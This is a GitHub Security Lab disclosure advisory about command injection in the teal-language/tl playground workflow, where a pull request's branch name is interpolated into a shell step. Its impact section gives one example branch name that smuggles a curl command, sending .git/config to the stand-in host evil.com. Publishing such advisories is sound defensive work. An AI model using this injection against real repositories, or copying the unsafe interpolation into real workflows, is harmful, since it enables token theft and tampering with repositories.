Coordinated Disclosure Timeline
- 2021-01-18: Report sent to maintainers.
- 2021-01-18: Issue resolved.
Summary
The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.
Product
teal-language/tl repository
Tested Version
The latest changeset of playground.yml to the date.
Details
Issue: A branch name from the pull request is used to format a shell command
on:
pull_request_target:
branches: [ master ]
...
- name: build
run: |
echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
cd ${{ github.workspace }}/teal-playground
yarn build
Impact
This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker controlled server.
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-017 in any communication regarding this issue.